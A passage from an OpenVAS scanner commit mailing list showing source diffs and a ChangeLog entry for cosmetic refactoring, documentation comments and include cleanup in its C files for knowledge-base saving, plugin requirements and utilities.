-static char * key_present(kb, keys) - struct kb_item ** kb; - struct arglist * keys; +/** + * @brief The opposite of the previous function (\ref key_missing). + */ +static char * +key_present (struct kb_item ** kb, struct arglist * keys) { if( kb == NULL || keys == NULL ) return NULL; @@ -144,7 +130,7 @@ } } return NULL; -} +} /********************************************************** @@ -155,24 +141,21 @@ -/*------------------------------------------------------ - - Returns if the lists of the required ports between - plugin 1 and plugin 2 have at least one port in common - - - ------------------------------------------------------*/ -struct arglist * -requirements_common_ports(plugin1, plugin2) - struct scheduler_plugin * plugin1, *plugin2; +/** + * @brief Returns \ if the lists of the required ports between + * @brief plugin 1 and plugin 2 have at least one port in common. + */ +struct arglist * +requirements_common_ports (struct scheduler_plugin * plugin1, + struct scheduler_plugin * plugin1) { struct arglist * ret = NULL; struct arglist * req1; struct arglist * req2; - - + + if(!plugin1 || !plugin2) return 0; - + req1 = plugin1->required_ports; if ( req1 == NULL ) return 0; @@ -180,7 +163,7 @@ req2 = plugin2->required_ports; if ( req2 == NULL ) return 0; - + while(req1->next != NULL) { struct arglist * r = req2; @@ -193,7 +176,7 @@ if(!ret)ret = emalloc(sizeof(struct arglist)); arg_add_value(ret, r->name, ARG_INT, 0,(void*)1); } - } + } r = r->next; } req1 = req1->next; @@ -215,25 +198,18 @@ struct scheduler_plugin * plugin) { if(key_missing(kb, plugin->mandatory_keys)) return 0; - + return 1; } -/*------------------------------------------------------- - - Determine if the plugin requirements are - met. - - Returns NULL is everything is ok, or else - returns an error message - ----------------------------------------------------------*/ - +/** + * @brief Determine if the plugin requirements are met. + * + * @return Returns NULL is everything is ok, else an error message. + */ char * -requirements_plugin(kb, plugin, preferences) - struct kb_item ** kb; - struct scheduler_plugin * plugin; - struct arglist * preferences; +requirements_plugin (struct kb_item ** kb, struct scheduler_plugin * plugin, + struct arglist * preferences) { static char error[64]; char * missing; @@ -244,14 +220,14 @@ /* * Check wether the good ports are open */ - error[sizeof(error) - 1] = '\0'; + error[sizeof(error) - 1] = '\0'; tcp = plugin->required_ports; if(tcp != NULL && (get_closed_ports(kb, tcp , preferences)) == 0) { strncpy(error, "none of the required tcp ports are open", sizeof(error) - 1); return error; } - + udp = plugin->required_udp_ports; if(udp != NULL && (get_closed_udp_ports(kb, udp , preferences)) == 0) { @@ -271,7 +247,7 @@ snprintf(error,sizeof(error), "because the key %s is missing", missing); return error; } - + if (opti != NULL && (strcmp(opti, "required_keys") == 0 || atoi(opti) == 2)) return NULL; Modified: trunk/openvas-scanner/openvassd/save_kb.c =================================================================== --- trunk/openvas-scanner/openvassd/save_kb.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/save_kb.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -33,7 +33,7 @@ * This has not only importance for debugging, but could also allow differential * scans and information gain other than vulnerabilities of targets. * @see diff_scan - * + * * Knowledge base backups are (if the appropriate preferences are set) saved * under (PREFIX)var/lib/openvas/users/(USERNAME)/kbs/(HOSTNAME) , * where strings in brackets have to be replaced by the respective value. @@ -63,10 +63,10 @@ ===========================================================================*/ /** - * @brief Replaces slashes in name by underscores. - * + * @brief Replaces slashes in name by underscores (in-place). + * * @param name String in which slashes will be replaced by underscores. - * + * * @return Pointer to the parameter name string. */ static char * @@ -106,7 +106,7 @@ { char *t; int ret = 0; - + dir = estrdup(dir); t = strchr(dir+1, '/'); while(t) @@ -116,8 +116,7 @@ t[0] = '/'; t = strchr(t+1, '/'); } - - + if ((ret = mkdir(dir, 0700)) < 0) { if(errno != EEXIST) log_write("mkdir(%s) failed : %s\n", dir, strerror(errno)); @@ -130,7 +129,10 @@ /** - * From , return /path/to/var/lib/openvas//kbs/ . + * @brief Returns file name where the kb for scan of a host can be saved/read + * @brief from. + * + * From \, return /path/to/var/lib/openvas/\/kbs/\ . */ static char* kb_fname (struct arglist* globals, char* hostname) @@ -138,9 +140,10 @@ gchar * dir = kb_dirname(globals); char * ret; char * hn = strdup(hostname); - - hn = filter_odd_name(hn); - + + hn = filter_odd_name (hn); + + /** @todo use glibs *build_path functions */ ret = emalloc(strlen(dir) + strlen(hn) + 2); sprintf(ret, "%s/%s", dir, hn); g_free (dir); @@ -159,13 +162,13 @@ char *ret; int i = 0; int len; - + bzero(&st, sizeof(st)); fstat(file, &st); len = (int)st.st_size; if ( len == 0 ) return NULL; - + lseek(file, 0, SEEK_SET); ret = emalloc(len + 1); while(i < len ) @@ -181,11 +184,11 @@ return NULL; } } - + lseek(file, len, SEEK_SET); return ret; } - + static int save_kb_entry_present_already (struct arglist * globals, char * hostname, char* name, char* value) @@ -194,11 +197,11 @@ int fd; char* req; int ret; - + fd = GPOINTER_TO_SIZE(arg_get_value(globals, "save_kb")); if(fd <= 0) return -1; - + buf = map_file(fd); if(buf) { @@ -213,8 +216,8 @@ return ret; } return -1; -} - +} + static int save_kb_rm_entry_value (struct arglist* globals, char* hostname, char* name, char* value) @@ -223,34 +226,34 @@ char * t; int fd; char * req; - - + + fd = GPOINTER_TO_SIZE(arg_get_value(globals, "save_kb")); if(fd <= 0) return -1; - + buf = map_file(fd); if(buf) { if(value) - { + { req = emalloc(strlen(name) + strlen(value) + 2); sprintf(req, "%s=%s", name, value); } - else + else req = estrdup(name); - + t = strstr(buf, req); if(t) { char * end; - + while(t[0] != '\n') { if(t == buf)break; else t--; } - + if(t[0] == '\n')t++; end = strchr(t, '\n'); t[0] = '\0'; @@ -263,18 +266,18 @@ { log_write("lseek() failed - %s\n", strerror(errno)); } - + if((ftruncate(fd, 0))<0) { log_write("ftruncate() failed - %s\n", strerror(errno)); } - - + + if(write(fd, buf, strlen(buf)) < 0) { log_write("write() failed - %s\n", strerror(errno)); } - + if(end){ if((write(fd, end, strlen(end)))<0) log_write("write() failed - %s\n", strerror(errno)); @@ -288,85 +291,90 @@ } static int -save_kb_rm_entry(globals, hostname, name) - struct arglist * globals; - char * hostname; - char * name; +save_kb_rm_entry (struct arglist * globals, char * hostname, char * name) { return save_kb_rm_entry_value(globals, hostname, name, NULL); } - + /** - * Write data + * @brief Writes an entry to a knowledge base file. * - * We want to avoid duplicates for : + * The entry will look like: + * 1254307384 1 Banner/22=SSH-2.0-OpenSSH_5.1p1 Debian-5\r\n + * where the first value is a timestamp, the second item is the \ref type, + * and the string before the equalsign in the third item is the key for the + * knowledge base and the rest the value for that key. * - * Successful/... - * SentData/... - * Launched/... + * Duplicates for keys starting with: + * Successful/... + * SentData/... + * Launched/... + * are not created (existing values are removed first). + * Any items starting with /tmp/, NIDS/ or Settings/ are not written to the file + * but rather ignored. * - * Ignores any items starting with /tmp/, NIDS/ or Settings/ + * @param name Key of the kb-item. + * @return -1 if invalid file handle to write to or any parameter is NULL, 0 + * otherwise. */ static int save_kb_write (struct arglist * globals, char* hostname, char* name, char* value, int type) { - int fd; - char * str; - int e; - struct timeval now; + int fd; + char * str; + int e; + struct timeval now; - if(!globals || - !hostname || - !name || - !value) - return -1; - - fd = GPOINTER_TO_SIZE(arg_get_value(globals, "save_kb")); - if(fd <= 0) - { - log_write("user %s : Can not find KB fd for %s\n", (char*)arg_get_value(globals, "user"), hostname); - return -1; - } - + if (!globals || !hostname || !name || !value) + return -1; - /* - * Don't save temporary KB entries - */ - if(!strncmp(name, "/tmp/", 4) || - !strncmp(name, "NIDS/", 5) || - !strncmp(name, "Settings/", 9)) - return 0; + fd = GPOINTER_TO_SIZE (arg_get_value(globals, "save_kb")); + if (fd <= 0) + { + log_write ("user %s : Can not find KB fd for %s\n", + (char*) arg_get_value (globals, "user"), hostname); + return -1; + } - /* Don't save sensitive information */ - if (strncmp(name, "Secret/", 7) == 0) - return 0; + /* Skip temporary KB entries */ + if (!strncmp (name, "/tmp/", 4) || + !strncmp (name, "NIDS/", 5) || + !strncmp (name, "Settings/", 9)) + return 0; - /* - * Avoid duplicates for these families - */ - if(!strncmp(name, "Success/", strlen("Success/")) || - !strncmp(name, "Launched/", strlen("Launched/")) || - !strncmp(name, "SentData/", strlen("SentData/"))) + /* Don't save sensitive information */ + if (strncmp (name, "Secret/", 7) == 0) + return 0; + + /* Avoid duplicates for these families */ + if (!strncmp (name, "Success/", strlen ("Success/")) || + !strncmp (name, "Launched/", strlen ("Launched/")) || + !strncmp (name, "SentData/", strlen ("SentData/"))) { - save_kb_rm_entry(globals, hostname, name); + save_kb_rm_entry (globals, hostname, name); } - - if(save_kb_entry_present_already(globals, hostname, name, value)) - { - save_kb_rm_entry_value(globals, hostname, name, value); - } - - str = emalloc(strlen(name) + strlen(value) + 25); - gettimeofday(&now, NULL); - sprintf(str, "%ld %d %s=%s\n", (long)now.tv_sec, type, name, value); - e = write(fd, str, strlen(str)); - if(e < 0) - { - log_write("user %s : write kb error - %s\n", (char*)arg_get_value(globals, "user"), strerror(errno)); - } - efree(&str); - return 0; + + if (save_kb_entry_present_already (globals, hostname, name, value)) + { + save_kb_rm_entry_value (globals, hostname, name, value); + } + + str = emalloc (strlen (name) + strlen (value) + 25); + gettimeofday (&now, NULL); + sprintf (str, "%ld %d %s=%s\n", (long) now.tv_sec, type, name, value); + + /** @todo Fix a bug (most probably race condition). Although following write + * call does return > 0, sometimes the content never reaches the file, + * especially for big amount of data in value (e.g. big file contents) */ + e = write (fd, str, strlen (str)); + if (e < 0) + { + log_write ("user %s : write kb error - %s\n", + (char*) arg_get_value (globals, "user"), strerror (errno)); + } + efree (&str); + return 0; } @@ -378,8 +386,8 @@ /** * @brief Initialize a new KB that will be saved. - * - * The indexes of all the opened KB are in a hashlist in + * + * The indices of all the opened KB are in a hashlist in * globals, saved under the name "save_kb". This makes no sense * at this time, as the test of each host is done in a separate * process, but this allows us to regroup easily these in @@ -399,9 +407,9 @@ dir = kb_dirname(globals); kb_mkdir(dir); efree(&dir); - + fname = kb_fname(globals, hostname); - + if(file_locked(fname)) { efree(&fname); @@ -440,17 +448,16 @@ } /** - * Returns <1> if we already saved a KB for this host, - * less than seconds ago. If is - * equal to zero, then the age is not taken in account - * (returns true if a knowledge base exists) + * @return 1 if we already saved a KB for this host, less than \ + * seconds ago. If \ equals zero, then the age is not taken in + * account (returns true if a knowledge base exists). */ int save_kb_exists (struct arglist * globals, char * hostname) { char * fname = kb_fname(globals, hostname); FILE *f; - + if(file_locked(fname)) { efree(&fname); @@ -467,12 +474,12 @@ int -save_kb_write_str (struct arglist * globals, char * hostname, char* name, +save_kb_write_str (struct arglist * globals, char * hostname, char* name, char* value) { char * newvalue = addslashes(value); int e; - + e = save_kb_write(globals, hostname, name, newvalue, ARG_STRING); efree(&newvalue); return e; @@ -502,11 +509,11 @@ char * fname = kb_fname(globals, hostname); char * bakname; int fd; - + bakname = emalloc(strlen(fname) + 5); strcat(bakname, fname); strcat(bakname, ".bak"); - + unlink(fname); if((fd = open(bakname, O_RDONLY)) >= 0) { @@ -525,27 +532,26 @@ char * fname = kb_fname(globals, hostname); char * newname = NULL; int fd_src = -1, fd_dst = -1; - - + if(file_locked(fname)) { log_write("%s is locked\n", fname); goto failed1; } - + file_lock(fname); - + newname = emalloc(strlen(fname) + 5); strcat(newname, fname); strcat(newname, ".bak"); - + if((fd_src = open(fname, O_RDONLY)) >= 0) { char buf[4096]; int n; fd_dst = open(newname, O_WRONLY|O_CREAT|O_TRUNC, 0640); if(fd_dst < 0) - { + { log_write("save_kb_backup failed : %s", strerror(errno)); close(fd_src); goto failed; @@ -565,13 +571,13 @@ goto failed; } m+=e; - } + } bzero(buf, sizeof(buf)); } } - else + else log_write("save_kb_backup failed : %s\n", strerror(errno)); - + close(fd_src); close(fd_dst); efree(&newname); @@ -580,7 +586,7 @@ return 0; failed: file_unlock(fname); -failed1: +failed1: efree(&fname); efree(&newname); return -1; @@ -602,7 +608,7 @@ struct kb_item ** kb; char buf[4096]; long max_age = save_kb_max_age(globals); - + if(file_locked(fname)) { efree(&fname); @@ -617,52 +623,55 @@ } bzero(buf, sizeof(buf)); fgets(buf, sizeof(buf) - 1, f); - + kb = kb_new(); - /* - * Ignore the date - */ - bzero(buf, sizeof(buf)); - + + /* Ignore the date */ + bzero(buf, sizeof(buf)); + while(fgets(buf, sizeof(buf) - 1, f)) { int type; char * name, * value, *t; struct timeval then, now; - + buf[strlen(buf)-1]='\0'; /* chomp(buf) */ t = strchr(buf, ' '); - if(!t)continue; - + if (!t) + continue; + t[0] = '\0'; - + then.tv_sec = atol(buf); t[0] = ' ';t++; type = atoi(t); t = strchr(t, ' '); - if(!t) - continue; + if (!t) + continue; + t[0] = ' ';t++; name = t; t = strchr(name, '='); - if(!t)continue; + if (!t) + continue; + t[0] = '\0'; name = strdup(name); t[0] = ' '; t++; value = strdup(t); - + if(strcmp(name, "Host/dead") && strncmp(name, "/tmp/", 4) && strcmp(name, "Host/ping_failed")) { gettimeofday(&now, NULL); if(now.tv_sec - then.tv_sec > max_age) { - /* + /* log_write("discarding %s because it's too old\n", name, (now.tv_sec - then.tv_sec)); - */ + */ } else { @@ -681,7 +690,7 @@ bzero(buf, sizeof(buf)); } fclose(f); - + /* * Re-open the file */ @@ -707,26 +716,29 @@ /** * @return 1 if the user wants us the save the knowledge base. + * @todo This operation is possibly executed often (with every kb modification). + * Evaluate wether the preference can change during a scan, consider the + * use of a static variable. */ int save_kb (struct arglist * globals) { - struct arglist * preferences; - char * value; - - if(!globals) + struct arglist * preferences; + char * value; + + if (!globals) + return 0; + + preferences = arg_get_value (globals, "preferences"); + if (!preferences) + return 0; + + value = arg_get_value (preferences, "save_knowledge_base"); + + if (value && !strcmp (value, "yes")) + return 1; + return 0; - - preferences = arg_get_value(globals, "preferences"); - if(!preferences) - return 0; - - value = arg_get_value(preferences, "save_knowledge_base"); - - if(value && !strcmp(value, "yes")) - return 1; - - return 0; } /** @@ -737,11 +749,11 @@ { struct arglist * preferences = arg_get_value(globals, "preferences"); char * value; - + value = arg_get_value(preferences, "only_test_hosts_whose_kb_we_have"); if(value && !strcmp(value, "yes")) return 1; - + return 0; } @@ -753,11 +765,11 @@ { struct arglist * preferences = arg_get_value(globals, "preferences"); char * value; - + value = arg_get_value(preferences, "only_test_hosts_whose_kb_we_dont_have"); if(value && !strcmp(value, "yes")) return 1; - + return 0; } @@ -769,11 +781,11 @@ { struct arglist * preferences = arg_get_value(globals, "preferences"); char * value; - + value = arg_get_value(preferences, "kb_restore"); if(value && !strcmp(value, "yes")) return 1; - + return 0; } @@ -806,7 +818,7 @@ break; /* ACT_SETTINGS and ACT_INIT should always be executed */ } - + if(name) { value = arg_get_value(preferences, name); Modified: trunk/openvas-scanner/openvassd/save_tests.c =================================================================== --- trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -173,7 +173,7 @@ asctime = emalloc(2048); t = time(NULL); lt = localtime(&t); - + /* * Session id : - */ @@ -182,10 +182,10 @@ dir = session_dirname(globals); session_mkdir(dir); efree(&dir); - + index_fname = session_fname(globals, asctime, "index"); data_fname = session_fname(globals, asctime, "data"); - + index = open(index_fname, O_CREAT|O_WRONLY|O_EXCL, 0600); file_lock(index_fname); if(index < 0) @@ -198,7 +198,7 @@ { struct arglist * prefs = arg_get_value(globals, "preferences"); char * target = arg_get_value(prefs, "TARGET"); - + log_write("user %s : session will be saved as %s", user, index_fname); if(arg_get_value(globals, "save_tests_index")) { @@ -206,7 +206,7 @@ } else arg_add_value(globals, "save_tests_index", ARG_INT, sizeof(gpointer), GSIZE_TO_POINTER(index)); - + if(arg_get_value(globals, "save_tests_index_fname")) { char * s = arg_get_value(globals, "save_tests_index_fname"); @@ -223,7 +223,7 @@ write(index, target, strlen(target)); write(index, "\n", 1); } - + data = open(data_fname, O_CREAT|O_WRONLY|O_EXCL, 0600); file_lock(data_fname); if(data < 0) @@ -454,20 +454,17 @@ session); return -1; } - + stat(index, &st); len = (int)st.st_size; - - /* - * Get the first line of our file, which contains the - * list of hosts to test - */ + + /* Get the first line of our file, which contains the list of hosts to test */ buf = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0); t = buf; while(t[length] && t[length]!='\n')length++; munmap(buf, len); close(fd); - + target = emalloc(length+3); f = fopen(index, "r"); fgets(target, length+2, f); @@ -476,10 +473,8 @@ buf = emalloc(4096); tested = g_hash_table_new_full (g_str_hash, g_str_equal, g_free, NULL); - /* - * Populate our harglst with the names of the - * hosts that have been completely tested - */ + /* Populate our hashtable with the names of the hosts that have been completely + * tested */ while(fgets(buf, 4095, f)) { if (buf[strlen(buf)-1] == '\n') @@ -491,9 +486,7 @@ efree(&buf); fclose(f); - /* - * Set the global variables accordingly - */ + /* Set the global variables accordingly */ if(arg_get_value(globals, "TESTED_HOSTS")) arg_set_value(globals, "TESTED_HOSTS", -1, tested); else Modified: trunk/openvas-scanner/openvassd/utils.c =================================================================== --- trunk/openvas-scanner/openvassd/utils.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/utils.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -26,8 +26,9 @@ * * */ - + #include + #include "log.h" #include "ntp.h" #include "auth.h" @@ -203,32 +204,29 @@ /** - * Returns the number of plugins that will be launched + * @brief Returns the number of plugins that will be launched. */ -int -get_active_plugins_number(plugins) - struct arglist * plugins; +int +get_active_plugins_number (struct arglist * plugins) { int num = 0; - + if(plugins != NULL) while(plugins->next != NULL) { - if(plug_get_launch(plugins->value) != LAUNCH_DISABLED )num++; + if (plug_get_launch(plugins->value) != LAUNCH_DISABLED) + num++; plugins = plugins->next; } - - + return num; } -void -plugins_set_ntp_caps(plugins, caps) - struct arglist * plugins; - ntp_caps* caps; +void +plugins_set_ntp_caps (struct arglist * plugins, ntp_caps* caps) { if(!caps || !plugins)return; while(plugins->next) @@ -238,7 +236,7 @@ v = plugins->value; else v = NULL; - + if( v != NULL ){ struct ntp_caps * old = arg_get_value(v, "NTP_CAPS"); if ( old != NULL ) @@ -257,19 +255,18 @@ int -is_symlink(name) - char * name; +is_symlink (char * name) { struct stat sb; if(stat(name, &sb))return(0); return(S_ISLNK(sb.st_mode)); } -void check_symlink(name) - char * name; +void +check_symlink (char * name) { - if(is_symlink(name)) - { + if (is_symlink(name)) + { fprintf(stderr, "The file %s is a symlink -- can't continue\n", name); DO_EXIT(0); } @@ -280,9 +277,8 @@ * to a space delimited lists of hosts * in one string and returns it. */ -char * -hosts_arglist_to_string(hosts) - struct arglist * hosts; +char * +hosts_arglist_to_string (struct arglist * hosts) { int num_hosts = 0; struct arglist * start = hosts; @@ -296,12 +292,12 @@ hosts_len+=strlen(hosts->value); } hosts = hosts->next; - } - + } + ret = emalloc(hosts_len + 2 * num_hosts + 1); - + hosts = start; - + while(hosts && hosts->next) { if(hosts->value){ strcat(ret, hosts->value); @@ -310,7 +306,7 @@ hosts = hosts->next; } return(ret); -} +} /*----------------------------------------------------------------- @@ -318,8 +314,9 @@ -------------------------------------------------------------------*/ +/** @todo use glib functions to create the path */ void -create_pid_file() +create_pid_file () { FILE * f; char * fname = malloc(strlen(OPENVASSD_PIDDIR) + strlen("/openvassd.pid") + 1); @@ -338,8 +335,9 @@ free(fname); } +/** @todo use glib functions to create the path */ void -delete_pid_file() +delete_pid_file () { char * fname = malloc(strlen(OPENVASSD_PIDDIR) + strlen("/openvassd.pid") + 1); strcpy(fname, OPENVASSD_PIDDIR); @@ -371,7 +369,7 @@ fd = open(ret, O_RDONLY); } while (fd >= 0); - + return ret; } @@ -381,19 +379,17 @@ /** * Determines if a process is alive - as reliably as we can */ -int -process_alive(pid) - pid_t pid; +int +process_alive (pid_t pid) { - int i, ret; - if( pid == 0 ) + int i, ret; + if (pid == 0) return 0; - - for(i=0,ret=1;(i<10) && (ret > 0);i++) - ret = waitpid(pid, NULL, WNOHANG); - - - return kill(pid, 0) == 0; + + for (i = 0,ret = 1;(i < 10) && (ret > 0) ; i++) + ret = waitpid (pid, NULL, WNOHANG); + + return kill (pid, 0) == 0; } From scm-commit at wald.intevation.org Mon Oct 5 11:19:23 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 11:19:23 +0200 (CEST) Subject: [Openvas-commits] r5364 - in trunk/openvas-scanner: . cnvts/find_service cnvts/openvas_tcp_scanner cnvts/synscan include openvassd Message-ID: <20091005091923.0CAFE865F477@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 11:19:22 +0200 (Mon, 05 Oct 2009) New Revision: 5364 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/cnvts/find_service/find_service.c trunk/openvas-scanner/cnvts/openvas_tcp_scanner/openvas_tcp_scanner.c trunk/openvas-scanner/cnvts/synscan/synscan.c trunk/openvas-scanner/include/includes.h trunk/openvas-scanner/openvassd/attack.c trunk/openvas-scanner/openvassd/openvassd.c trunk/openvas-scanner/openvassd/oval_plugins.c trunk/openvas-scanner/openvassd/piic.c trunk/openvas-scanner/openvassd/pluginlaunch.h trunk/openvas-scanner/openvassd/pluginscheduler.c trunk/openvas-scanner/openvassd/plugs_req.c trunk/openvas-scanner/openvassd/save_kb.c trunk/openvas-scanner/openvassd/save_tests.c trunk/openvas-scanner/openvassd/utils.c Log: Towards removal of libopenvas.h. * openvassd/attack.c (attack_network): Removed unused variable. * cnvts/find_service/find_service.c, cnvts/openvas_tcp_scanner.c, cnvts/synscan/synscan.c, openvassd/save_kb.c, openvassd/save_tests.c: Cleaned up/added includes. * include/includes.h: Removed include of libopenvas.h and ntp.h. * openvassd/openvassd.c, openvassd/oval_plugins.c, openvassd/utils.c: Added include of libopenvas.h where not yet resolved. * openvassd/plugs_req.c: Added include. (requirements_common_ports): Corrected typo from last commit. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/ChangeLog 2009-10-05 09:19:22 UTC (rev 5364) @@ -1,5 +1,23 @@ 2009-10-05 Felix Wolfsteller + Towards removal of libopenvas.h. + + * openvassd/attack.c + (attack_network): Removed unused variable. + + * cnvts/find_service/find_service.c, cnvts/openvas_tcp_scanner.c, + cnvts/synscan/synscan.c: Cleaned up/added includes. + + * include/includes.h: Removed include of libopenvas.h and ntp.h. + + * openvassd/openvassd.c, openvassd/oval_plugins.c, openvassd/utils.c: + Added include of libopenvas.h where not yet resolved. + + * openvassd/plugs_req.c: Added include. + (requirements_common_ports): Corrected typo from last commit. + +2009-10-05 Felix Wolfsteller + * openvassd/pluginscheduler.c, openvassd/plugs_req.c, openvassd/save_kb.c, openvassd/save_tests.c, openvassd/utils.c, openvassd/piic.c: Cosmetics, doc, todos added. Modified: trunk/openvas-scanner/cnvts/find_service/find_service.c =================================================================== --- trunk/openvas-scanner/cnvts/find_service/find_service.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/cnvts/find_service/find_service.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -9,6 +9,12 @@ #include +#include "libopenvas.h" + +#include /* for struct arglist */ +#include /* for ACT_SCANNER */ +#include /* for OPENVAS_ENCAPS_IP */ + #include #define EN_NAME "Services" Modified: trunk/openvas-scanner/cnvts/openvas_tcp_scanner/openvas_tcp_scanner.c =================================================================== --- trunk/openvas-scanner/cnvts/openvas_tcp_scanner/openvas_tcp_scanner.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/cnvts/openvas_tcp_scanner/openvas_tcp_scanner.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -19,6 +19,11 @@ #include +#include /* for struct arglist */ +#include /* for ACT_SCANNER */ +#include /* for find_in_path */ +#include /* for efree */ + #ifdef LINUX #include #include Modified: trunk/openvas-scanner/cnvts/synscan/synscan.c =================================================================== --- trunk/openvas-scanner/cnvts/synscan/synscan.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/cnvts/synscan/synscan.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -3,9 +3,15 @@ #include #include +#include /* for struct arglist */ +#include /* for bpf_open_live */ +#include /* for ACT_SCANNER */ +#include /* for get_datalink_size */ +#include /* for scanner_add_port */ +#include /* for efree */ -#undef DEBUG +#undef DEBUG #undef SHOW_RETRIES #undef SHOW_RTT_REMOVAL Modified: trunk/openvas-scanner/include/includes.h =================================================================== --- trunk/openvas-scanner/include/includes.h 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/include/includes.h 2009-10-05 09:19:22 UTC (rev 5364) @@ -273,8 +273,6 @@ #include #include -#include -#include #ifdef HAVE_SHL_LOAD /* I love HPUX (jh) */ #undef dlopen Modified: trunk/openvas-scanner/openvassd/attack.c =================================================================== --- trunk/openvas-scanner/openvassd/attack.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/attack.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -31,27 +31,34 @@ #include #include +#include /* for kb_new */ +#include /* for auth_printf */ +#include /* for ACT_INIT */ +#include /* for is_local_ip */ +#include /* for plug_get_path */ +#include /* for setproctitle */ +#include /* for emalloc */ #include "attack.h" +#include "auth.h" +#include "comm.h" +#include "hosts.h" #include "log.h" -#include "sighand.h" -#include "rules.h" -#include "auth.h" -#include "processes.h" -#include "comm.h" -#include "utils.h" -#include "preferences.h" #include "ntp.h" #include "ntp_11.h" #include "openvas_ssh_login.h" +#include "pluginlaunch.h" #include "pluginload.h" +#include "pluginscheduler.h" +#include "plugs_req.h" +#include "preferences.h" +#include "processes.h" +#include "rules.h" #include "save_tests.h" #include "save_kb.h" +#include "sighand.h" +#include "utils.h" -#include "pluginscheduler.h" -#include "pluginlaunch.h" -#include "plugs_req.h" -#include "hosts.h" #define ERR_HOST_DEAD -1 #define ERR_CANT_FORK -2 @@ -729,7 +736,6 @@ plugins_scheduler_t sched; int fork_retries = 0; GHashTable* files; - char * key; struct timeval then, now; inaddrs_t addrs; char buffer[INET6_ADDRSTRLEN]; Modified: trunk/openvas-scanner/openvassd/openvassd.c =================================================================== --- trunk/openvas-scanner/openvassd/openvassd.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/openvassd.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -46,6 +46,8 @@ #include #include +#include "libopenvas.h" + #ifdef USE_LIBWRAP #include #include Modified: trunk/openvas-scanner/openvassd/oval_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -31,6 +31,8 @@ #include +#include "libopenvas.h" + #include #include Modified: trunk/openvas-scanner/openvassd/piic.c =================================================================== --- trunk/openvas-scanner/openvassd/piic.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/piic.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -30,6 +30,11 @@ #include +#include /* for kb_item_set_int */ +#include /* for internal_recv */ +#include /* for INTERNAL_COMM_MSG_TYPE_KB */ +#include /* for efree */ + #include "log.h" #include "save_kb.h" #include "utils.h" Modified: trunk/openvas-scanner/openvassd/pluginlaunch.h =================================================================== --- trunk/openvas-scanner/openvassd/pluginlaunch.h 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/pluginlaunch.h 2009-10-05 09:19:22 UTC (rev 5364) @@ -27,10 +27,12 @@ * */ - #ifndef __PLUGINLAUNCH_H__ #define __PLUGINLAUNCH_H__ +#include "pluginload.h" /* for struct pl_class_t */ +#include "pluginscheduler.h" /* for struct plugins_scheduler_t */ + void pluginlaunch_init(struct arglist * ); void pluginlaunch_wait(); void pluginlaunch_wait_for_free_process(); Modified: trunk/openvas-scanner/openvassd/pluginscheduler.c =================================================================== --- trunk/openvas-scanner/openvassd/pluginscheduler.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/pluginscheduler.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -30,6 +30,10 @@ #include +#include /* for ACT_SCANNER */ +#include /* for plug_get_required_ports */ +#include /* for emalloc */ + #include #define IN_SCHEDULER_CODE 1 Modified: trunk/openvas-scanner/openvassd/plugs_req.c =================================================================== --- trunk/openvas-scanner/openvassd/plugs_req.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/plugs_req.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -30,6 +30,8 @@ #include +#include /* for emalloc */ + #include "pluginscheduler.h" #include "plugs_req.h" @@ -147,7 +149,7 @@ */ struct arglist * requirements_common_ports (struct scheduler_plugin * plugin1, - struct scheduler_plugin * plugin1) + struct scheduler_plugin * plugin2) { struct arglist * ret = NULL; struct arglist * req1; Modified: trunk/openvas-scanner/openvassd/save_kb.c =================================================================== --- trunk/openvas-scanner/openvassd/save_kb.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/save_kb.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -43,6 +43,11 @@ #include +#include /* for ACT_SCANNER */ +#include /* for kb_new */ +#include /* for addslashes.h */ +#include /* for estrdup */ + #include "log.h" #include "comm.h" #include "users.h" Modified: trunk/openvas-scanner/openvassd/save_tests.c =================================================================== --- trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -29,6 +29,8 @@ #include +#include /* for emalloc */ + #include #include "log.h" Modified: trunk/openvas-scanner/openvassd/utils.c =================================================================== --- trunk/openvas-scanner/openvassd/utils.c 2009-10-05 09:09:07 UTC (rev 5363) 